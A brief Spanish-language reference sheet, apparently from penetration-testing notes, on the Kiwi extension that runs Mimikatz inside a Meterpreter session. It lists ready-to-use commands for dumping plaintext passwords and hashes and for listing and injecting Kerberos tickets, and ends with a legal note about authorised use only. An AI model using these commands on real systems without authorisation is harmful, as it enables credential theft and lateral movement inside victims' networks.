🐥 Kiwi - Mimikatz embebido en Meterpreter

Kiwi es una extensión de Meterpreter que permite utilizar funcionalidades de Mimikatz directamente desde una sesión de Metasploit, sin necesidad de subir binarios ni ejecutar herramientas externas.


🎯 ¿Qué permite hacer?

Una vez cargada la extensión, te brinda comandos similares a los de Mimikatz para:

  • Extraer credenciales (plaintext, NTLM, LM, SHA1)
  • Volcar credenciales de sistemas Kerberos
  • Inyectar tickets Kerberos
  • Enumerar sesiones y usuarios conectados
  • Elevar privilegios o duplicar tokens

🚀 ¿Cómo se usa?

  1. Desde una sesión de meterpreter:
meterpreter > load kiwi
  1. Extraer todas las credenciales (como en la imagen):
meterpreter > creds_all
  1. Listar usuarios conectados:
meterpreter > kiwi_cmd sekurlsa::logonpasswords

📌 Comandos útiles

ComandoDescripción
load kiwiCarga la extensión
creds_allExtrae credenciales de todas las fuentes
kiwi_cmd sekurlsa::logonpasswordsEjecuta Mimikatz desde Meterpreter
kiwi_cmd kerberos::listLista tickets Kerberos
kiwi_cmd kerberos::pttInyecta tickets
kiwi_cmd sekurlsa::ticketsMuestra tickets activos

🔐 Requisitos

  • Acceso como Administrador o SYSTEM

  • Tener una sesión Meterpreter activa (ideal: windows/x64/meterpreter/reverse_tcp)


🛑 Nota legal: El uso de Kiwi está limitado a entornos controlados con consentimiento explícito. Utilizarlo sin autorización es ilegal.

herramientas